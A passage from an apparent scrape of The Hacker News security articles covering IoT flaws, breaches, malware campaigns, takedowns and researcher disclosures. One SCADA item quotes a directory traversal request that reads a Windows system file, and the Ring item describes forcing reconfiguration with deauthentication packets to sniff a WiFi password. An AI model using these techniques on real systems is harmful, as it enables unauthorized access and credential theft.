Since this attack can only be performed during the ""one-time initial configuration"" of the device, you might be wondering how an attacker can leverage this loophole after the device has already been configured.
Researchers suggested that by continuously sending de-authentication messages to the device, an attacker can trick the user into believing that the device is malfunctioning, forcing him to re-configure it.
""Attackers can trigger the reconfiguration of the Ring Video Doorbell Pro. One way to do this is to continuously send deauthentication packets, so that the device is dropped from the wireless network. At this point, the App loses connectivity and tells the user to reconfigure the device,"" the researchers told The Hacker News.
""The live view button becomes greyed out and, when clicked, the app will suggest restarting the router or pressing the setup button twice on the doorbell. Pressing the button twice will trigger the device to try to reconnect to the network – an action that will fail. The last resort is to try and reconfigure the device,"" Bitdefender said in a blog post.
Once the owner enters into the configuration mode to re-share WiFi credentials, the attacker sniffing the traffic would capture the password in plaintext, as shown in the screenshot.
Once in possession of a user's WiFi password, an attacker can launch various network-based attacks, including:
Interact with all devices within the household network;
Intercept network traffic and run man-in-the-middle attacks
Access all local storage (NAS, for example) and subsequently access private photos, videos and other types of information,
Exploit all vulnerabilities existing in the devices connected to the local network and get full access to each device; that may lead to reading emails and private conversations,
Get access to security cameras and steal video recordings.
Bitdefender discovered this vulnerability in Ring Video Doorbell Pro devices in June this year and responsibly reported it to Amazon, but got no update from the company.
When requested for an update in late July, the vendor closed the vulnerability report in August and marked it as a duplicate without saying whether a third party already reported this issue.
However, after some communication with the vendor, an automatic fix for the vulnerability was partially issued on 5th September.
""However, to be on the safe side Ring Video Doorbell Pro users should make sure they have the latest update installed. If so, they're safe.""
""Customer trust is important to us and we take the security of our devices seriously. We rolled out an automatic security update addressing the issue, and it's since been patched,"" a spokesperson for the Ring told The Hacker News.
A similar security vulnerability was discovered and patched in the Ring Video Doorbell devices in early 2016 that was also exposing the owner's WiFi network password to attackers.
"Pirate Bay co-founder Gottfrid Svartholm, aka Anakata, Released from Prison",https://thehackernews.com/2015/09/pirate-bay-gottfrid.html,"Gottfrid Svartholm Warg, the co-founder of the notorious file-sharing website The Pirate Bay, has been released from a Sweden prison following three years behind bars for hacking and copyright offenses.
Yes, Svartholm Warg, also known as Anakata, is a free man again.
Svartholm was convicted on both Swedish copyright offences and Danish hacking conspiracy connected to The Pirate Bay.
The news comes just a few months after the third and last founder of Pirate Bay Fredrik Neij (also known as TiAMO) was released from a Swedish prison after serving his 10-month prison sentence.
Svartholm has not yet made any public statements following his release from a Swedish prison on Saturday. His release was reported by Swedish newspaper Dagens Nyheter.
However, the release was confirmed by Warg's mother Kristina Svartholm on Twitter.
""Yes, #anakata is free now. No more need to call for #freeanakata. Thank you everyone for your important support during these three years!""
Svartholm was arrested in his Cambodian apartment in September 2012, and extradited to Sweden in November 2013, where he served charges for copyright theft. In November 2013, he was finally extradited to Denmark to face charges in the CSC hacking cases.
Once the world's most popular file-sharing website, The Pirate Bay predominantly used to share copyrighted material, such as pirated software, video files and other stuff, free of charge.
Despite the criminal convictions and numerous takedowns in police raids, the Pirate Bay continues to operate, although it has moved to different Web domains several times.
SEC Discloses Hackers Broke Into Edgar Corporate Filing System Last Year,https://thehackernews.com/2017/09/sec-corporate-filing-hack.html,"This month has been full of breaches.
Now, the Securities and Exchange Commission (SEC), the top U.S. markets regulator, has disclosed that hackers managed to hack into its financial document filing system and may have illegally profited from the stolen information.
On Wednesday, the SEC announced that its officials learnt last month that a previously detected 2016 cyber attack, which exploited a ""software vulnerability"" in the online EDGAR public-company filing system, may have ""provided the basis for illicit gain through trading.""
EDGAR, short for Electronic Data Gathering, Analysis, and Retrieval, is an online filing system where companies submit their financial filings, which processes around 1.7 million electronic filings a year.
The database lists millions of filings on corporate disclosures—ranging from quarterly earnings to sensitive and confidential information on mergers and acquisitions, which could be used for insider-trading or manipulating U.S. equity markets.
The hackers exploited the flaw last year in the EDGAR system, which was ""patched promptly"" after its discovery, to gain access to its corporate disclosure database and stole nonpublic information, SEC chairman Jay Clayton said in a long statement on Wednesday evening.
""Notwithstanding our efforts to protect our systems and manage cybersecurity risk, in certain cases cyber threat actors have managed to access or misuse our systems,"" Clayton said.
""We believe the intrusion did not result in unauthorized access to personally identifiable information, jeopardize the operations of the Commission, or result in systemic risk.""
Clayton further said the SEC is currently investigating the incident and is cooperating with law enforcement authorities.
Besides this, SEC officials are also looking at cases of individuals who they believe placed false SEC filings on their EDGAR system in order to profit from the ""resulting market movements.""
The SEC's disclosure comes two weeks after credit-reporting firm Equifax announced the company had been a victim of a hack that resulted in the theft of personal data on over 143 million Americans.
Such incidents raise concerns about the security policies of these companies.
As Reuters reported, months after the 2016 breach was detected, Government Accountability Office found that the SEC did not always use encryption, used unsupported software, and failed to implement well-tuned firewalls and other key security features while going about its business.
"Alexa, Are You Spying On Me? Not Really, Maybe, It's Complex!",https://thehackernews.com/2017/08/hacking-amazon-echo-spying.html,"Do you own an Amazon Echo?
So are you also worried about hackers turning out your device into a covert listening device?
Just relax, if there's no NSA, no CIA or none of your above-skilled friends after you.
Since yesterday there have been several reports on Amazon Echo hack that could allow a hacker to turn your smart speaker into a covert listening device, but users don't need to worry because the hack is not simple, requires physical access to the device and does not work on all devices, as well.
Amazon Echo is an always-listening voice-activated smart home speaker that is designed to play music, set alarms, answer questions via the Alexa voice assistant, and control connected smart home devices like WeMo, Hive and Nest.
Hack Turns Amazon Echo Into Spying Device (But It's Complex)
Now researchers from MWR InfoSecurity have demonstrated a hack, showing how hackers can exploit a vulnerability in some models of Amazon Echo to turn them into covert listening devices that can secretly record your most intimate moments.
But the hack is not simple and has some significant limitations:
The first major limitation of the Amazon Echo hack is that it does involve the hacker being able to gain physical access to the device, though, according to researchers, it is possible to tamper with the Echo without leaving any traces behind.
The second limitation is that the Amazon Echo hack works only against older models, as the vulnerability discovered by MWR researchers only affects the 2015 and 2016 versions of the AI-powered speaker.
Another major limitation to carry out this hack is that the attacker should be above average skills in Linux as well as embedded hardware systems.
In short, it is a very sophisticated hack that first requires James Bond to bypass all CCTV cameras, if you have, to stealthily gain physical access to your premises, and then at least 30 minutes spare time with the Amazon Echo to install the malware without leaving any traces of tampering.
In another scenario, as described by the researchers, your house cleaner or maid who has access to your device could also perform this attack, so the researchers dubbed the attack as ""evil maid.""
However, the 'evil maid' attack is not as impressive as it sounds because in such highly targeted scenario one can simply implant bugging devices with less effort, knowledge and time.
Hacking Amazon Echo: How It Works?
In order to carry out the evil maid hack, MWR Labs security researcher Mark Barnes first removed the Echo's rubber base on the bottom, which allowed them to access 18 debug ""pads"" Amazon engineers rely on to carry out various diagnostics.
Barnes then directly booted into the actual firmware of the device via an external SD card. From there, he was able to install persistent malware without leaving any physical traces of tampering with the device.
The malware then allowed the researcher to gain remote root shell access of the device, and ultimately access to the 'always listening' microphones.
""Once we'd root we examined the processes running on the device and the scripts that spawn these processes,"" Barnes wrote. ""We were able to understand how audio media is being passed and buffered between processes and the tools that are used to create and interact with these audio buffers.""
Barnes said his team then developed scripts that leveraged tools embedded on the Amazon Echo to continuously stream the raw microphone audio over TCP/IP to a remote server without affecting the actual functionality of the device itself.
This eventually means that hackers, at least theoretically, can covertly monitor and listen in on users conversations and steal private data without their permission or even realisation.
""The rooting of the Amazon Echo device in itself was trivial; however, it raises a number of important questions for manufacturers of Internet enabled or 'Smart Home' devices,"" Barnes added.
The researcher warned users from buying smart speakers from third-party retailers, along with advising them to push the Echo's mute button to disable the microphone physically.
In response to the MWR's findings, Amazon released a statement saying the best way for users to protect themselves from such tamperings is always to buy the Echo from the company directly.
""Customer trust is very important to us. To help ensure the latest safeguards are in place, as a general rule, we recommend customers purchase Amazon devices from Amazon or a trusted retailer and that they keep their software up-to-date,"" the company said.
Users owning 2017 models of the device are not affected by this latest hack, as the new models introduced a mitigation that joins two of the crucial debugging pads in a way that prevents the device from external booting.
Three Chinese Hackers Fined $9 Million for Stealing Trade Secrets,https://thehackernews.com/2017/05/chinese-hacker-trade-secrets.html,"Hackers won't be spared.
Three Chinese hackers have been ordered to pay $8.8 million (£6.8 million) after hacking email servers of two major New York-based law firms to steal corporate merger plans in December 2016 and used them to trade stocks.
The U.S. District Judge Valerie Caproni in Manhattan sued 26-year-old Iat Hong, 30-year-old Bo Zheng, and 50-year-old Hung Chin, over a multi-million dollar insider trading scam.
According to BBC News, the U.S. Securities Exchange Commission (SEC) alleged the three hackers targeted 7 different law firms, but managed to installed malware on networks belonging to two law firms only, then compromised their IT admin accounts that gave the trio access to every email account at the firms.
Access to the email and web servers allowed them to gain information on planned business mergers and/or acquisitions. The trio then used this information to buy company stock before the deal, and then sell it after the public announcement of the merger or acquisition.
The hackers made more than $4 Million in illegal profits and could face at least decades-long prison sentences if found guilty.
""The trio then bought shares in listed companies ahead of announcements about their merger plans – something that often causes the stock to jump,"" BBC says.
""The counts against them include conspiracy to commit securities fraud, conspiracy to commit wire fraud, wire fraud, conspiracy to commit computer intrusion, unlawful access, and intentional damage.""
All the three hackers were charged in December 2016 both by the Securities and Exchange Commission (SEC), and the Department of Justice (DoJ). However, neither of them identified the affected law firms.
Mr. Hong has been ordered to pay $1.8 Million, Mr. Zheng to pay $1.9 Million, and Mr. Chin to pay $4 Million. Any United States assets they own will also be seized.
For now, only Hong, who was arrested in last December in Hong Kong, is in custody and yet to be extradited to the United States, while other two cyber criminals are on the run.
Zero-Day Warning! Ransomware targets Microsoft Office 365 Users,https://thehackernews.com/2016/06/ransomware-msoffice.html,"If just relying on the security tools of Microsoft Office 365 can protect you from cyber attacks, you are wrong.
Variants of Cerber Ransomware are now targeting MS Office 365 email users with a massive zero-day attack that has the ability to bypass Office 365's built-in security tools.
According to a report published by cloud security provider Avanan, the massive zero-day Cerber ransomware attack targeted Microsoft Office 365 users with spam or phishing emails carrying malicious file attachments.
The Cerber ransomware is invoked via Macros. Yes, it's hard to believe but even in 2016, a single MS Office document could compromise your system by enabling 'Macros'.
Locky and Dridex ransomware malware also made use of the malicious Macros to hijack systems. Over $22 Million were pilfered from the UK banks with the Dridex Malware that got triggered via a nasty macro virus.
You can see a screenshot of the malicious document in the latest malware campaign below, targeting Microsoft Office 365 users:
While the security firm did not specify the exact number of users possibly hit by the ransomware, Microsoft reported in its first quarter 2016 that there are almost 18.2 Million Office 365 subscribers.
""While difficult to precisely measure how many users got infected,"" Avanan estimated that ""roughly 57 percent of organizations using Office 365 received at least one copy of the malware into one of their corporate mailboxes during the time of the attack.""
Although Cerber originally emerged in March, the malware campaign targeting Office 365 users began on June 22. However, Microsoft started blocking the malicious file attachment on June 23.
The Cerber Ransomware not only encrypts user files and displays a ransom note, but also takes over the user's audio system to read out its ransom note informing them that their files were encrypted.
The ransomware encrypts files with AES-256 encryption, asking victims to pay 1.24 Bitcoin (nearly US$810) for the decryption key.
How to Protect Yourself from Cerber Ransomware
In order to prevent yourself from the Cerber or any ransomware attack:
Always keep your system and antivirus up-to-date.
Regularly backup your files in an external hard-drive.
Disable Macros in your MS Office programs.
Always beware of phishing emails, spams, and clicking the malicious attachment.
You can also use an Intrusion detection system (IDS), for which you can try AlienVault Unified Security Management (USM) that includes an inbuilt IDS with SIEM and real-time threat intelligence to help you quickly detect malware and other threats in your network.
We have also written a step-by-step tutorial article on How to Protect your Computer from Macro-based Malware, which you can follow to secure yourself.
Power Plants Are Vulnerable To Hackers with Siemens flaw,https://thehackernews.com/2012/08/power-plants-are-vulnerable-to-hackers.html,"The U.S. Department of Homeland Security has issued an alert warning that hackers could exploit code in Siemens-owned technology to attack power plants and other national critical infrastructure.
Justin W. Clarke, an expert in securing industrial control systems, disclosed at a conference in Los Angeles on Friday that he had figured out a way to spy on traffic moving through networking equipment manufactured by Siemens' RuggedCom division.
RuggedCom, a Canadian subsidiary of Siemens that sells networking equipment for use in harsh environments such as areas with extreme weather, said it was investigating Clarke's findings, but declined to elaborate. Clarke said that the discovery of the flaw is disturbing because hackers who can spy on communications of infrastructure operators could gain credentials to access computer systems that control power plants and other critical systems.
According to security researcher Justin W. Clarke, Rugged OS contains the same private key used to decrypt secure-sockets-layer communications sent by administrators who log into the devices. This allows attackers who may have compromised a host on the network to eavesdrop on sessions and retrieve user login credentials and other sensitive details.
Plenty of small and home office routers also contain private SSL keys. What's different here is that RuggedCom devices, which are designed to withstand extreme dust, heat, and other harsh conditions, are connected to machinery that controls electrical substations, traffic control systems, and other critical infrastructure.
This is the second bug that Clarke, a high school graduate who never attended college, has discovered in products from RuggedCom, which are widely used by power companies that rely on its equipment to support communications to remote power stations.
Although there have been no publicly reported cases of damage caused by cyber-attacks on US critical infrastructure, the issue is a growing problem.
Countries around the world have been alerted to the threat after revelations that the Stuxnet virus had targeted a uranium enrichment facility in Iran.Earlier this month security firms reported another type of malware - dubbed Shamoon had struck ""at least one organisation"" in the energy sector.
European Authorities Disrupt Emotet — World's Most Dangerous Malware,https://thehackernews.com/2021/01/european-authorities-disrupt-emotet.html,"Law enforcement agencies from as many as eight countries dismantled the infrastructure of Emotet, a notorious email-based Windows malware behind several botnet-driven spam campaigns and ransomware attacks over the past decade.
The coordinated takedown of the botnet on Tuesday — dubbed ""Operation Ladybird"" — is the result of a joint effort between authorities in the Netherlands, Germany, the U.S., the U.K., France, Lithuania, Canada, and Ukraine to take control of servers used to run and maintain the malware network.
""The Emotet infrastructure essentially acted as a primary door opener for computer systems on a global scale,"" Europol said. ""What made Emotet so dangerous is that the malware was offered for hire to other cybercriminals to install other types of malware, such as banking Trojans or ransomware, onto a victim's computer.""
More Than a Malware
Since its first identification in 2014, Emotet has evolved from its initial roots as a credential stealer and banking Trojan to a powerful ""Swiss Army knife"" that can serve as a downloader, information stealer, and spambot depending on how it's deployed.
Known for being constantly under development, the cybercrime service updates itself regularly to improve stealthiness, persistence, and add new spying capabilities through a wide range of modules, including a Wi-Fi spreader that was recently added to identify and compromise fresh victims connected to nearby Wi-Fi networks.
Last year, the malware was linked to several botnet-driven spam campaigns and even capable of delivering more dangerous payloads such as TrickBot and Ryuk ransomware by renting its botnet of compromised machines to other malware groups.
""The Emotet group managed to take e-mail as an attack vector to a next level,"" Europol said.
700 Emotet Servers Seized
The U.K.'s National Crime Agency (NCA) said the operation took nearly two years to map the infrastructure of Emotet, with multiple properties in the Ukrainian city of Kharkiv raided to confiscate computer equipment used by the hackers.
The Ukrainian Cyberpolice Department also arrested two individuals allegedly involved in the botnet's infrastructure maintenance, both of whom are facing 12 years in prison if found guilty.
""Analysis of accounts used by the group behind Emotet showed $10.5 million being moved over a two-year period on just one Virtual Currency platform,"" the NCA said, adding ""almost $500,000 had been spent by the group over the same period to maintain its criminal infrastructure.""
Globally, Emotet-linked damages are said to have cost about $2.5 billion, Ukrainian authorities said.
With at least 700 servers operated by Emotet across the world now having been taken down from the inside, machines infected by the malware are set to be directed to this law enforcement-infrastructure, thus preventing further exploitation.
In addition, the Dutch National Police has released a tool to check for potential compromise, based on a dataset containing 600,000 e-mail addresses, usernames, and passwords that were identified during the operation.
Emotet to Be Wiped En Masse on April 25, 2021
The Dutch police, which seized two central servers located in the country, said it has deployed a software update to neutralize the threat posed by Emotet effectively.
""All infected computer systems will automatically retrieve the update there, after which the Emotet infection will be quarantined,"" the agency said. According to a tweet from a security researcher who goes by the Twitter handle milkream, Emotet is expected to be wiped on April 25, 2021, at 12:00 local time from all compromised machines.
Corroborating the findings, Malwarebytes researchers said the payload to remove the malware (""EmotetLoader.dll"") will be pushed via the same channels that were used to distribute the original Emotet, with the uninstaller deleting the service associated with the malware and its autorun Registry key.
The April deadline also means that the update doesn't entirely prevent Emotet (""X.dll"") from being installed on a system. But with the command-and-control servers now sinkholed and under law enforcement's control, the malware will be stymied in its efforts to download further modules onto the infected host.
""The lengthy delay for the cleanup routine to activate may be explained by the need to give system administrators time for forensics analysis and checking for other infections,"" Malwarebytes' Threat Intelligence Team said.
Given the nature of the takedown operation, it remains to be seen if Emotet can stage a comeback. If it does, it wouldn't be the first time a botnet survived major disruption efforts.
As of writing, Abuse.ch's Feodo Tracker shows at least 20 Emotet servers are still online.
""A combination of both updated cybersecurity tools (antivirus and operating systems) and cybersecurity awareness is essential to avoid falling victim to sophisticated botnets like Emotet,"" Europol cautioned.
""Users should carefully check their e-mail and avoid opening messages and especially attachments from unknown senders. If a message seems too good to be true, it likely is and e-mails that implore a sense of urgency should be avoided at all costs.""
LinkedIn Clickjacking vulnerability tricks users to spam links,https://thehackernews.com/2013/07/hacking-linkedin-account-vulnerability_13.html,"A Clickjacking vulnerability existed on LinkedIn that allowed an attacker to trick users for sharing and posting links on behalf of victim.
Narendra Bhati(R00t Sh3ll), Security Analyst at Cyber Octet informed us about LinkedIn Bug. Clickjacking, also referred as ""User Interface redress attack"" is one type of website hacking technique where an attack tricks a web user into clicking a button, a link or a picture, etc. that the web user did not intend to click, typically by overlaying the web page with an iframe.
Flaw allows attacker to open LinkedIn page https://www.linkedin.com/shareArticle? , used to share links and articles summary, in a hidden iframe.
Proof of Concept:
1.) Semi Transparent Iframe Layers :
2.) Fully activated page with zero Transparency ifarme:
Video Demonstration:
Many countermeasures have been described that help web users protect against clickjacking attacks. X-FRAME-OPTIONS is a browser-based defense method. In order to bring the X-FRAME-OPTIONS protection into effect, LinkedIn should send a HTTP header named X-FRAME-OPTIONs on HTML responses.
Facebook Introduces Anonymous Login to Limit Third-party App Permissions,https://thehackernews.com/2014/05/facebook-anonymous-login-third-party-apps.html,"We're comfortable in sharing information with our Facebook friends, but it is quite sneaky for Facebook users to offer their Identities and credentials when logging in to third-party apps, they don't trust. To deal with this issue, the social network giant has plans to improve the way users login to the third party apps with more privacy controls on the web as well as mobile devices.
At Facebook's F8 developer conference in San Francisco on Wednesday, Keynote speaker - Chief Executive Mark Zuckerberg announced the new Facebook's login tool, ""Anonymous Login"" that would let users sign into apps and websites anonymously without sharing their personal information-Biggest news for Facebook users.
""Today, we want to do more to put control and power back into people's hands,"" Zuckerberg said at the conference. ""Up until now, your friends have been able to share your data via using apps. Now we're changing this, so everybody controls how their data is shared with apps, even ones others are using.""
Another new feature Facebook is rolling out in the next few months will also gives you total control over exactly what information you would like to share with the individual third-party app. Facebook is also planning to limit the ability of third-party app to read the content shared between the users and their friends.
This new privacy feature will let user options to permit whether third-party apps will be able to access their information when their friend logs in with Facebook or not.
""With the new Login, I can sign in on my own terms. I can uncheck boxes I don't want to share. We've heard very clearly about how you want more control with how you're sharing with apps, and this new Login gives you that control.""
Once users have decided an Facebook app is trustworthy, they can connect it to their profile and allow, say, the posting of automatic status updates, or access other parts of an account.
In addition to the Anonymous Login and better controls over app permissions, Facebook is also going to redesign its app permissions dashboard, making it much easier for its users to edit what permissions they have granted to their apps.
""At Facebook, we serve a lot of groups, including developers, advertisers, and employees—but the most important group we serve is the people who use our products,"" Zuckerberg said. ""And we must always put those people first. People want more control over how they share their information, especially with apps, and they want more control how apps share their data.""
Addressing the developers, Mark Zuckerberg said the tool would let Facebook users feel free and more comfortable about signing into more apps using Facebook and moreover this new feature will let more and more people to try out new apps.
""By giving people more power and control, they're going to trust all the apps that we build more, and over time use them more. And that's positive for everyone,"" said Zuckerberg.
For advertisers and app makers, the company has also announced a new mobile AD Product dubbed as ""Facebook Audience Network,"" that will leverage app developers to insert ads from Facebook's more than 1 million advertisers into their own apps and then split the revenue, which is now open for registration.
For the rest of Facebook's developer audience, the social network promised not to break things anymore, a dramatic switch in its founding motto of ""Move fast and break things.""
This new move of the popular Internet giant is a conscious effort to get users more comfortable with sharing their information during a time when privacy concerns and security breaches abound and it shows Facebook cares about your privacy.
The engineers at Facebook are testing the Anonymous Login with a few developers for now, and after the testing period it will widely available to all developers ""in the coming months.""
Hacker Arrested after Exposing Flaws in Elections Site,https://thehackernews.com/2016/05/hack-an-election.html,"A security researcher responsibly disclosed vulnerabilities in the poorly secured web domains of a Florida county elections, but he ended up in handcuffs on criminal hacking charges and jailed for six hours Wednesday.
Security researcher David Michael Levin, 31, of Estero, Florida was charged with three counts of gaining unauthorized access to a computer, network, or electronic instrument.
On 19 December last year, Levin tested the security of Lee County website and found a critical SQL injection vulnerability in it, which allowed him to access site's database, including username and password.
Levin was reportedly using a free SQL testing software called Havij for testing SQL vulnerabilities on the state elections website.
According to Levin, he responsibly reported vulnerabilities to the respective authorities and helped them to patch all loopholes in the elections website.
Video Demonstration of the Elections Website Hack
Meanwhile, Levin demonstrates his finding via an interview, but he published that video interview on YouTube in late January when authorities had already patched the reported flaws.
Levin recorded the video together with Dan Sinclair, detailing how a simple SQL injection launched against the election website led to the theft of data from the Elections' database that had no encryption at all.
As proof of concept, Levin showed him entering the username and password of Sharon Harrington, the county's Supervisor of Elections, that allowed him to gain control of a content management system (CMS) used to control the official website of Florida's Office of Elections.
However, this video was misunderstood and used as an evidence by the Florida Department of Law Enforcement officials to backfire Levin.
Almost two weeks after the video was posted on YouTube, Florida police raided Levin's house and seized his computers.
Levin was arrested and charged with allegedly breaking into a couple of elections websites in Florida. He spent six hours in jail last Wednesday before being released on a $15,000 bond, the Florida Department of Law Enforcement officials said.
Though Florida Police claimed Levin never asked for permission prior to performing his penetration testing on any state-owned server, Sinclair said that Levin was the one who helped the authority fix the security holes in the website.
""He took usernames and passwords from the Lee County website and gained further access to areas that were password-protected,"" FDLE Special Agent Larry Long told the Herald Times. ""The state statute is pretty clear. You need to have authorization before you can do that.""
However, Sinclair reached out to The Hacker News, revealing that Mr. Levin contacted the authorities while performing his research.
""The FDLE came to Dave, and then to me about the case,"" Sinclair said. ""We believed they were investigating the holes in the servers and the Gross Negligence. We both gave them the only information they have now that is accurate. While interviewing me, and Agent Chris Tissot kept cutting me off when I answered his questions.""
""I quickly realized Tissot was not investigating any of the claims. His sole goal was to find an obscure law they could hit Dave with, to discredit the information Dave went public with (after he helped them fix the holes).""
At this point it seems that federal agents are not adequately investigating the matter, rather they are trying to prove Levin culprit in this whole event.
0-Day SCADA Exploits Publicly Exposed by Italian researchers,https://thehackernews.com/2011/09/0-day-scada-exploits-publicly-exposed.html,"0-Day SCADA Exploits Publicly Exposed by Italian researchers
An Italian researcher has uncovered at least a dozen security flaws in software used in utilities and other critical infrastructure systems, prompting security advisories from the U.S. government. Security researcher Luigi Auriemma disclosed the attacks against six SCADA (Supervisory Control and Data Acquisition) systems including US giant Rockwell Automation.The step-by-step exploits allowed attackers to execute full remote compromises and denial of service attacks.Some of the affected SCADA systems were used in power, water and waste distribution and agriculture.Such zero-day information disclosure was generally frowned upon in the information security industry because it exposed customers to attack while published vulnerabilities remained unpatched.Attacks against SCADA systems were particularly controversial because exploits could affect a host of machinery from lift control mechanisms to power plants.
The advisories published by Luigi include short write-ups on each of the vulnerabilities, as well as proof-of-concept exploit code and examples. The affected products include those from Cogent, DAQFactory, Progea, Carel, and Rockwell, all of which fall under the general umbrella definition of SCADA.While some of the exploits include more advanced exploits, like heap and buffer overflows, some are simple Web directory traversal flaws requiring nothing more than a Web browser to exploit. An attacker can make a request like https://SERVER/..\..\..\..\..\..\boot.ini to the vulnerable Web server and retrieve files outside of the root directory of the Web server. In this example, the attacker can download the Windows boot.ini, which in and of itself is not a big concern, but does serve as good proof of the validity of the vulnerability and shows the ease in which the vulnerability can be exploited.
Starting at the top of the list of advisories on Luigi's site, I didn't have much luck finding servers using search strings based on product and company name. There were a few false positives, a few interesting telnet servers, but nothing of interest until I got to the Carel PlantVisor. There were 290 hits, and based on the server strings that identified the version (i.e., CarelDataServer,,, every single one is vulnerable. Additionally, a cursory glance at the SessionID for the Carel servers in the search results made me think it also suffers from a lack of entropy that could lead to easy session ID hijacking.
All of the vulnerabilities disclosed by Auriemma exist in the so-called Human Machine Interface (HMI) systems used to manage industrial control systems, said Joseph Weiss, managing partner at Applied Control Systems LLC and author of the book Protecting Industrial Control Systems from Electronic Threat.
""Vulnerabilities in HMI systems are not novel,"" but they should not be minimized, he said. Such vulnerabilities can be used to get at the downstream control system, he said. ""You can use the HMI to get to the control device and you can use the control device to get to the HMI,"" he said. Without further analysis, it is too soon to say whether the flaws discovered by Auriemma are really critical or not, he said. A lot depends on the kind of applications for which the affected systems are used, he said. ""Rockwell is a major manufacturer. They make a lot of systems, some of which are used in really critical applications,"" he added. There's no reason critical systems such as these should be exposed to the public.
LVI Attacks: New Intel CPU Vulnerability Puts Data Centers At Risk,https://thehackernews.com/2020/03/intel-load-value-injection.html,"It appears there is no end in sight to the hardware level security vulnerabilities in Intel processors, as well as to the endless 'performance killing' patches that resolve them.
Modern Intel CPUs have now been found vulnerable to a new attack that involves reversely exploiting Meltdown-type data leak vulnerabilities to bypass existing defenses, two separate teams of researchers told The Hacker News.
Tracked as CVE-2020-0551, dubbed ""Load Value Injection in the Line Fill Buffers"" or LVI-LFB for short, the new speculative-execution attack could let a less privileged attacker steal sensitive information—encryption keys or passwords—from the protected memory and subsequently, take significant control over a targeted system.
According to experts at Bitdefender and academic researchers from a couple of universities, the new attack is particularly devastating in multi-tenant environments such as enterprise workstations or cloud servers in the datacenter.
And, that's because a less-privileged rouge tenant could exploit this issue to leak sensitive information from a more privileged user or from a different virtualized environment on top of the hypervisor.
Intel CPUs 'Load Value Injection' Vulnerability
Unlike previously disclosed Intel chipset vulnerabilities—including Meltdown, Spectre, and MDS—where an attacker speculatively accesses the memory or sniffs the data when the victim accesses it, the new LVI-LFB attack involves attacker injecting malicious data into the buffers that victim program unwillingly uses during the speculative execution.
""The attacker sprays the LFBs with the address of a malicious function, and when the victim issues an indirect branch through memory which requires a microcode assist, the address of the malicious function is loaded from the LFBs, thus leading to the attacker function being speculatively executed,"" Bitdefender researchers told The Hacker News.
Though the latest flaw is a new variant of MDS attacks, it can't be mitigated with existing patches for previously disclosed Meltdown, Foreshadow, ZombieLoad, RIDL, or Fallout speculative-execution attacks.
""It combines Spectre-style code gadgets in the victim application with Meltdown-type illegal data flow from faulting or assisted memory load instructions to bypass existing defenses and inject attacker-controlled data into a victim's transient execution,"" the researcher Jo Van Bulck and his team said in a detailed paper.
As illustrated in the image above, the LVI attack can be executed in 4 simple steps:
Poison a hidden processor buffer with attacker values,
Induce faulting or assisted load in the victim program,
The attacker's value is transiently injected into code gadgets following the faulting load in the victim program,
Side channels may leave secret-dependent traces before the processor detects the mistake and rolls back all operations.
In other words, when the victim actively tries to execute some code, the attacker can actively fill the MDS buffers with carefully chosen values to influence the execution of the victim's thread.
PoC Exploit Demo and Security Patches
According to the researchers, there are several possible scenarios to exploit the LVI-LFB based control flow hijacking attack, such as: influencing an address that is accessed, the offset within an accessed buffer, the result of a conditional branch, or affecting the destination of an indirect branch.
""LVI based control flow hijacking allows an attacker to trick the victim into speculatively executing a function of his choosing. This works, theoretically, across all security boundaries: process to process, user-mode to kernel-mode, guest-mode to root-mode, and perhaps even user-mode to enclave,"" Bitdefender researchers said.
Both teams of researchers have also developed proof-of-concept exploits, one of which could let attackers compromise the security of Intel SGX enclaves is now available on GitHub.
Though researchers haven't tested AMD or ARM processors, they hinted ""in principle, any processor that is vulnerable to Meltdown-type data leakage would also be vulnerable to LVI-style data injection.""
Jo Van Bulck led team reported this flaw to the Intel team almost a year ago, whereas Bitdefender reported it just last month immediately after discovering it independently.
Intel has acknowledged these findings and today released a list of all affected products on its website along with the information on microcode security patch updates.
However, since the hardware flaws cannot be eradicated with software patches and flushing affected buffers are no longer sufficient, researchers suggest affected users to either disable rich performance features like hyper-threading, or replace the hardware to completely avoid such vulnerabilities.
Judy Android Malware Infects Over 36.5 Million Google Play Store Users,https://thehackernews.com/2017/05/android-adware-malware.html,"Security researchers have claimed to have discovered possibly the largest malware campaign on Google Play Store that has already infected around 36.5 million Android devices with malicious ad-click software.
The security firm Checkpoint on Thursday published a blog post revealing more than 41 Android applications from a Korean company on Google Play Store that make money for its creators by creating fake advertisement clicks from the infected devices.
All the malicious apps, developed by Korea-based Kiniwini and published under the moniker ENISTUDIO Corp, contained an adware program, dubbed Judy, that is being used to generate fraudulent clicks to generate revenue from advertisements.
Moreover, the researchers also uncovered a few more apps, published by other developers on Play Store, inexplicably containing the same the malware in them.
The connection between the two campaigns remains unclear, though researchers believe it is possible that one developer borrowed code from the other, ""knowingly or unknowingly.""
""It is quite unusual to find an actual organization behind the mobile malware, as most of them are developed by purely malicious actors,"" CheckPoint researchers say.
Apps available on play store directly do not contain any malicious code that helped apps to bypass Google Bouncer protections.
Once downloaded, the app silently registers user device to a remote command and control server, and in reply, it receives the actual malicious payload containing a JavaScript that starts the actual malicious process.
""The malware opens the URLs using the user agent that imitates a PC browser in a hidden webpage and receives a redirection to another website,"" the researchers say. ""Once the targeted website is launched, the malware uses the JavaScript code to locate and click on banners from the Google ads infrastructure.""
The malicious apps are actual legitimate games, but in the background, they act as a bridge to connect the victim's device to the adware server.
Once the connection is established, the malicious apps spoof user agents to imitate itself as a desktop browser to open a page and generate clicks.
Here's a list of malicious apps developed by Kiniwini and if you have any of these installed on your device, remove it immediately:
Fashion Judy: Snow Queen style
Animal Judy: Persian cat care
Fashion Judy: Pretty rapper
Fashion Judy: Teacher style
Animal Judy: Dragon care
Chef Judy: Halloween Cookies
Fashion Judy: Wedding Party
Animal Judy: Teddy Bear care
Fashion Judy: Bunny Girl Style
Fashion Judy: Frozen Princess
Chef Judy: Triangular Kimbap
Chef Judy: Udong Maker – Cook
Fashion Judy: Uniform style
Animal Judy: Rabbit care
Fashion Judy: Vampire style
Animal Judy: Nine-Tailed Fox
Chef Judy: Jelly Maker – Cook
Chef Judy: Chicken Maker
Animal Judy: Sea otter care
Animal Judy: Elephant care
Judy's Happy House
Chef Judy: Hotdog Maker – Cook
Chef Judy: Birthday Food Maker
Fashion Judy: Wedding day
Fashion Judy: Waitress style
Chef Judy: Character Lunch
Chef Judy: Picnic Lunch Maker
Animal Judy: Rudolph care
Judy's Hospital: Pediatrics
Fashion Judy: Country style
Animal Judy: Feral Cat care
Fashion Judy: Twice Style
Fashion Judy: Myth Style
Animal Judy: Fennec Fox care
Animal Judy: Dog care
